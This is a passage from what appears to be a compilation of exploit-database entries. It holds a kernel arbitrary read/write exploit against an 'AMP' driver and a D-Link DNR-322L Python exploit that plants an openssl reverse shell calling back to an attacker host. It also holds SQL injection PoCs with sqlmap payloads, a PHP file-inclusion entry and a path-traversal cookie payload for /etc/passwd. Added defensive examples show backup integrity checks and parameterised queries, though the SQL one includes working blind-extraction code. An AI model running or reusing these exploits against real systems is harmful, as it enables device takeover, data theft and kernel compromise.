          *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // function pointer, this will be 5
          *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
          *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
          *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
          *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
          *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2
          *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3
          *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4
          return (void*)maliciousBuffer;
      }

      void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {
          byte* maliciousBuffer = (byte*)malloc(bufferSize);
          *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // function pointer, this will be 5
          *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
          *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
          *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
          *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
          *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
          *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3
          *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4
          *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown
          *(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1
          return (void*)maliciousBuffer;
      }

      void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {
          byte* maliciousBuffer = (byte*)malloc(bufferSize);
          *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // function pointer, this will be 5
          *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
          *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
          *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
          *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
          *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
          *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3
          *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40); // param4
          *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff;
          return (void*)maliciousBuffer;
      }

      DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
          void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize);
          callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
          free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
          //address should now be written in kernel memory
          void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize);
          callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
          DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40);
          free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
          return returnVal;
      }

      void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
          void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize);
          callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
          free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
          //address should now be written in kernel memory
          void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite, bufferSize);
          callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
          free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
          return;
      }

      void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
          DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize);
          DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize);
          void** Pqword = (void**)malloc(0x8);
          for (int i = 0; i < 4; i++) {
              ((byte*)Pqword)[i] = ((byte*)&firstDWORD)[i];
              ((byte*)Pqword)[i + 4] = ((byte*)&secondDWORD)[i];
          }
          return (*(void**)Pqword);
      }

      void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
          writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize);
          writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize);
      }

      int main(int argc, char* argv[]) {
          ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16);
          HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP");
          SIZE_T size = 0x300;
          if (strcmp(argv[1], "read") == 0) {
              void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size);
              printf("Value stored at virtual address %0llx is %0llx", addressToReadorWrite, leakedQWORD);
          }
          else if (strcmp(argv[1], "write") == 0) {
              ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16);
              writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size);
              printf("Wrote %0llx to virtual address %0llx", QWORDToWrite, addressToReadorWrite);
          }
      }
      ```
15. # Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
# Date: 13.09.2022
# Exploit Author: luka <[email protected]>
# Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html
# Vendor Homepage: https://dlink.com
# Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305
# Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE
# Version: <= 2.60B15
# Tested on: Debian, Windows 10

```python
"""
# Vulnerability
Inside the configuration backup from "Maintenance/System/Configuration Settings"
is the bash script "rc.init.sh". The device does not check the integrity of a
restored configuration backup, which enables editing of said bash script. This
bash script will be executed when the device boots.

# Usage
exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT

options:
  -h, --help                          show this help message and exit
  -U USERNAME, --username USERNAME    Username, ex: admin
  -P PASSWORD, --password PASSWORD    Password for the specified user
  -t TARGET, --target TARGET          IP of the target, ex: 192.168.99.99
  -l LHOST, --lhost LHOST             IP for the reverse shell to connect back to, ex: 123.123.123.123
  -p LPORT, --lport LPORT             Port for the reverse shell to connect back to, ex: 8443
"""
import argparse
import base64
import os
import random
import shutil
import socket
import string
import tarfile
import urllib.parse
from ipaddress import ip_address

import requests

args = argparse.ArgumentParser()
args.add_argument("-U", "--username", type=str, required=True, dest="username",
                  help="Username, ex: admin")
args.add_argument("-P", "--password", type=str, required=False, dest="password",
                  help="Password for the specified user")
args.add_argument("-t", "--target", type=str, required=True, dest="target",
                  help="IP of the target, ex: 192.168.99.99")
args.add_argument("-l", "--lhost", type=str, required=True, dest="lhost",
                  help="IP for the reverse shell to connect back to, ex: 123.123.123.123")
args.add_argument("-p", "--lport", type=int, required=True, dest="lport",
                  help="Port for the reverse shell to connect back to, ex: 8443")
args = args.parse_args()


# base64 + url encode string
# returns string
def b64_url_encode(data):
    enc = data.encode("utf-8")
    encB = base64.b64encode(enc)
    encUrl = urllib.parse.quote(str(encB, "utf-8"))
    return encUrl


# since user input is always unsafe, test IPs
try:
    ip_address(args.target)
except Exception:
    print("[!] Target IP is not a valid IP address")
    exit(1)
try:
    ip_address(args.lhost)
except Exception:
    print("[!] Reverse shell IP is not a valid IP address")
    exit(1)

# check if target is online
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    # hardcoded http, change if needed
    s.connect((args.target, 80))
    s.close()
except Exception:
    print("[!] Target is not online")
    exit(1)
print("[+] Target is online")

# login param
authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi"
authHeaders = {"content-type": "application/x-www-form-urlencoded"}
authCheckCmd = "cmd=ui_check_wto"
session = requests.Session()

# if password is empty don't supply anything
if not args.password:
    authBody = (
        "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
        + args.username
        + "&pwd=&ssl_port=443&f_login_type=0&f_url="
    )
else:
    authBody = (
        "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username="
        + args.username
        + "&pwd="
        + b64_url_encode(args.password)
        + "&ssl_port=443&f_login_type=0&f_url="
    )

try:
    # login
    reqLogin = session.post(authUrl, headers=authHeaders, data=authBody)
    # check if successful
    reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd)
    if "success" in reqCheck.text:
        print("[+] Login successful")
    else:
        print("[!] Error during login, check credentials")
        exit(1)
except Exception as error:
    print(error)
    print("[!] Error during login, check credentials")
    exit(1)

# download backup
print("[*] Downloading backup")
if os.path.exists("backup_clean"):
    os.remove("backup_clean")

# download param
downloadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
downloadHeaders = {"content-type": "application/x-www-form-urlencoded"}
downloadCmd = "cmd=cgi_backup_conf"
try:
    reqBackup = session.post(downloadUrl, headers=downloadHeaders, data=downloadCmd)
except Exception as error:
    print(error)
    print("[!] Error while downloading backup")
    exit(1)

# saving to disk
try:
    f = open("backup_clean", "wb")
    f.write(reqBackup.content)
    f.close()
    if not os.path.exists("backup_clean"):
        print("[!] Error while saving backup")
        exit(1)
except Exception as error:
    print(error)
    print("[!] Error while saving backup")
    exit(1)
print("[+] Download successful")

# unpack backup (tar.gz file)
try:
    config = tarfile.open("backup_clean")
    config.extractall()
    config.close()
except Exception as error:
    print(error)
    print("[!] Error while unpacking backup")
    exit(1)

# inject stuff into startup script
try:
    bashscript = open("backup/rc.init.sh", "a")
    # revshell with openssl
    payload = (
        "\n(( sleep 10; rm -f /tmp/lol; mknod /tmp/lol p; cat /tmp/lol | /bin/ash -i 2>&1 | openssl s_client -quiet -connect %s:%s >/tmp/lol & ) & )\n"
        % (args.lhost, args.lport)
    )
    bashscript.write(payload)
    # also start a telnet daemon (has same passwd as web)
    # bashscript.write("utelnetd -d")
    bashscript.close()
except Exception as error:
    print(error)
    print("[!] Error while creating malicious backup")
    exit(1)
print("[+] Created malicious backup")

# re-pack file
try:
    configInj = tarfile.open("backup_injected", "w:gz")
    configInj.add("backup")
    configInj.close()
    # remove unpacked folder
    shutil.rmtree("backup", ignore_errors=False, onerror=None)
except Exception as error:
    print(error)
    print("[!] Error while re-packing malicious backup")
    exit(1)

# upload
print("[*] Uploading malicious backup")
uploadUrl = "http://" + args.target + "/cgi-bin/system_mgr.cgi"
uploadHeaders = {
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryhellothere"
}
configInj = open("backup_injected", "rb")
# latin-1 round-trips every byte value; http.client encodes a str body back with the same codec
tardata = configInj.read().decode("latin-1")
uploadBody = (
    '------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="cmd"\r\n\r\ncgi_restore_conf\r\n'
    '------WebKitFormBoundaryhellothere\r\nContent-Disposition: form-data; name="file"; filename="backup"\r\nContent-Type: application/x-gzip\r\n\r\n'
    + tardata
    + "\r\n------WebKitFormBoundaryhellothere--\r\n"
)
reqUpload = session.post(uploadUrl, headers=uploadHeaders, data=uploadBody)
if "web/dsk_mgr/wait.html" in reqUpload.text:
    print("[+] Upload successful, target will reboot now")
else:
    print("[!] Error while uploading malicious backup")
    exit(1)

# creating listener
print("[*] Started listener, waiting for the shell to connect back")
print("[*] When you are done kill the shell with Ctrl+C")
# random name
randInt = "".join(random.choice(string.ascii_lowercase) for i in range(10))
# generate the cert and the key for the openssl listener
os.system(
    'openssl req -x509 -newkey rsa:4096 -keyout /tmp/%s_key.pem -out /tmp/%s_cert.pem -days 365 -nodes -subj "/CN=example.com" 2> /dev/null'
    % (randInt, randInt)
)
# create an openssl listener
os.system(
    "openssl s_server -quiet -key /tmp/%s_key.pem -cert /tmp/%s_cert.pem -port %s"
    % (randInt, randInt, args.lport)
)
exit(0)
```
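The root cause in the write-up above is that cgi_restore_conf applies whatever tar.gz it is handed. The following is an added example, not part of luka's exploit or of D-Link's firmware, showing the check a restore path should perform: the backup carries an HMAC over its contents under a device-held key, and a restore with an edited rc.init.sh is refused. The key, the member names and the in-memory tar handling are assumptions made for the demonstration.

```python
import hashlib
import hmac
import io
import tarfile

# Hypothetical per-device secret. Real firmware would keep this in protected
# storage; it is hard-coded here only so the example runs stand-alone.
DEVICE_KEY = b"example-device-key-not-a-real-secret"
TAG_MEMBER = "backup/.integrity"   # archive member that carries the HMAC tag


def build_archive(members):
    """Pack {member_name: bytes} into an in-memory tar.gz (stands in for the
    archive cgi_backup_conf returns)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_archive(blob):
    """Unpack a tar.gz from memory into {member_name: bytes}."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        return {m.name: tar.extractfile(m).read() for m in tar.getmembers() if m.isfile()}


def content_tag(members):
    """HMAC over every member name and content hash in a canonical order, so
    adding, removing or editing any file changes the tag."""
    mac = hmac.new(DEVICE_KEY, digestmod=hashlib.sha256)
    for name in sorted(members):
        if name == TAG_MEMBER:
            continue
        mac.update(name.encode() + b"\0")
        mac.update(hashlib.sha256(members[name]).digest())
    return mac.hexdigest().encode()


def export_backup(members):
    """Device side (backup): add the tag before the archive leaves the box."""
    signed = dict(members)
    signed[TAG_MEMBER] = content_tag(members)
    return build_archive(signed)


def restore_backup(blob):
    """Device side (restore): verify the tag before any file is applied.
    This is the check the DNR-322L lacks."""
    members = read_archive(blob)
    tag = members.get(TAG_MEMBER)
    if tag is None:
        raise ValueError("backup has no integrity tag")
    if not hmac.compare_digest(tag, content_tag(members)):
        raise ValueError("backup integrity check failed")
    return {k: v for k, v in members.items() if k != TAG_MEMBER}


def inject_into_rc_init(blob, payload):
    """Attacker side: the same edit the exploit makes (append to rc.init.sh
    and re-pack), done in memory. The attacker cannot recompute TAG_MEMBER."""
    members = read_archive(blob)
    members["backup/rc.init.sh"] = members["backup/rc.init.sh"] + payload
    return build_archive(members)


def demo():
    """Returns the restored member names of a clean backup and the verdict
    on a tampered one."""
    clean = export_backup({
        "backup/rc.init.sh": b"#!/bin/sh\n# constructed boot script\n",
        "backup/config.xml": b"<config/>\n",
    })
    restored = restore_backup(clean)
    evil = inject_into_rc_init(clean, b"\n( sleep 10; /bin/ash -i ) &\n")
    try:
        restore_backup(evil)
        verdict = "accepted"
    except ValueError as exc:
        verdict = str(exc)
    return sorted(restored), verdict


if __name__ == "__main__":
    print(demo())
```

A tag over the decompressed members, rather than over the gzip bytes, means the device can still re-pack or re-compress legitimately; the trade-off is that the tag must be bound to the key inside the device, not to anything in the archive itself.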
16. # Exploit Title: Human Resources Management System v1.0 - Multiple SQLi
# Date: 16/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0
# Tested on: Windows

## Description
A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote commands through arbitrary SQL commands via the "name" parameter.

## Request PoC
```http
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

[email protected]'&password=test&submit=Sign+In
```
This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of the "name" parameter, the response to the request was a 302 Found status code, but 20 seconds later, which indicates that our sleep(20) command works.
```http
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In
```

## Exploit with sqlmap
Save the request from Burp to a file.
```
┌──(root㉿caesar)-[/home/kali/Workstation/hrm]
└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2
---snip----
[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: [email protected]' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In
---
[15:49:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.0, Apache 2.4.54, PHP
----snip----
```

## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.
17. ## Exploit Title: Employee Performance Evaluation System v1.0 - File Inclusion and RCE
## Exploit Author: nu11secur1ty
## Date: 03.17.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Employee Performance Evaluation System 1.0 suffers from File Inclusion / RCE vulnerabilities. The usual user of this system is allowed to submit a malicious file or upload a malicious file to the server. After that, this user can remotely execute the already included malicious file on the victim's server. This can bring the system to disaster, destroy all information inside it, or allow that information to be stolen.

STATUS: CRITICAL Vulnerability

[+]Get Info:
```php
<?php
// by nu11secur1ty - 2023
phpinfo();
?>
```

[+]Exploit:
```php
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/";
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/";
// using rename() function to rename the file
rename($old_name, $new_name);
?>
```

## Proof Of Concept:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
18. # Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux

## Description
A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump the database through arbitrary SQL commands.

## Request PoC
```http
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
This request causes a Fatal Error in the web app. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of the "cid" parameter, the response to the request was a 200 OK status code, but 10 seconds later, which indicates that our sleep(10) command works.
```http
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```

## Exploit with sqlmap
Save the request from Burp to a file.
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2
---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```

## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" is also vulnerable. It can be exploited in the same way.
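Items 16 and 18 describe the same defect: a request parameter concatenated into a MySQL query string. The following is an added example, not taken from either advisory or from the affected applications, that shows the vulnerable and the parameterised form of such a login query on an in-memory SQLite table (constructed here) and then drives boolean-based blind extraction, the technique sqlmap reported, through the vulnerable one. Table, column and function names are assumptions; SQLite's unicode()/substr() stand in for MySQL's ASCII()/SUBSTRING(), the control flow is the same.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the applications' users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.execute("INSERT INTO users (email, password) VALUES ('admin@example.com', 's3cret')")
    db.commit()
    return db


def login_vulnerable(db, name, password):
    """The pattern behind the advisories: user input pasted straight into SQL."""
    sql = "SELECT id FROM users WHERE email = '%s' AND password = '%s'" % (name, password)
    return db.execute(sql).fetchone() is not None


def login_safe(db, name, password):
    """Same query with bound parameters: the quote in the input is data, not syntax."""
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone() is not None


def _binary_search(oracle, greater_than_query, lo, hi):
    """Find v in [lo, hi] when oracle(greater_than_query(m)) answers 'v > m'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(greater_than_query(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(oracle, email="admin@example.com"):
    """Boolean-based blind extraction through a login oracle.
    oracle(name) -> True when the login query matched a row. Each character
    costs about seven requests (binary search over printable ASCII)."""
    def length_gt(n):
        return "' OR (SELECT length(password) FROM users WHERE email='%s') > %d -- " % (email, n)

    length = _binary_search(oracle, length_gt, 0, 64)
    recovered = ""
    for pos in range(1, length + 1):
        def char_gt(code, pos=pos):
            return ("' OR (SELECT unicode(substr(password,%d,1)) FROM users "
                    "WHERE email='%s') > %d -- " % (pos, email, code))
        recovered += chr(_binary_search(oracle, char_gt, 32, 126))
    return recovered


def demo():
    db = make_db()
    bypass = "x' OR 1=1 -- "
    return {
        "bypass_vulnerable": login_vulnerable(db, bypass, "wrong"),
        "bypass_safe": login_safe(db, bypass, "wrong"),
        "leaked": extract_password(lambda name: login_vulnerable(db, name, "wrong")),
        "leaked_from_safe": extract_password(lambda name: login_safe(db, name, "wrong")),
    }


if __name__ == "__main__":
    print(demo())
```

Against the parameterised query the oracle never answers true, so the length search converges on zero and nothing is recovered; that is the whole difference between the two functions.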
19. ## Exploit Title: Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal
## Exploit Author: nu11secur1ty
## Date: 09.29.2022
## Vendor: https://lavalite.org/
## Software: https://github.com/LavaLite/cms/releases/tag/v9.0.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite

## Description:
The XSRF-TOKEN cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The payload ../../../../../../../../../../../../../../../../etc/passwd[0x00]eyJpdiI6InhwNlhibUc0K3hrL3RQdHZNYlp5Qnc9PSIsInZhbHVlIjoiU2daQ2YzeFNWSjN4OHZNdEZSMlhiOVpkbGUweDdKSDdXbXc1eitGc3RSTXNFTFBqUGR1ekJOSitUTjcyWVRYTkVzV2lpMDkxb3FHM2k5S1Y2VlZZRGVVN2h2WkpJeGcxZVluVDhrdDkvUDgxN2hTNjY5elRtQllheDlPOEM5aGgiLCJtYWMiOiI4ZDBkMjI0NmFkNDQ2YTA5ZjhkNDI0ZjdhODk0NWUzMjY2OTIxMjRmMzZlZjI4YWMwNmRiYTU5YzRiODE5MDk5IiwidGFnIjoiIn0= was submitted in the XSRF-TOKEN cookie. The requested file was returned in the application's response. A malicious user can obtain very sensitive information from this CMS system.

STATUS: HIGH Vulnerability

[+]Payload:
```http
GET /cms-master/website/public/about.html HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
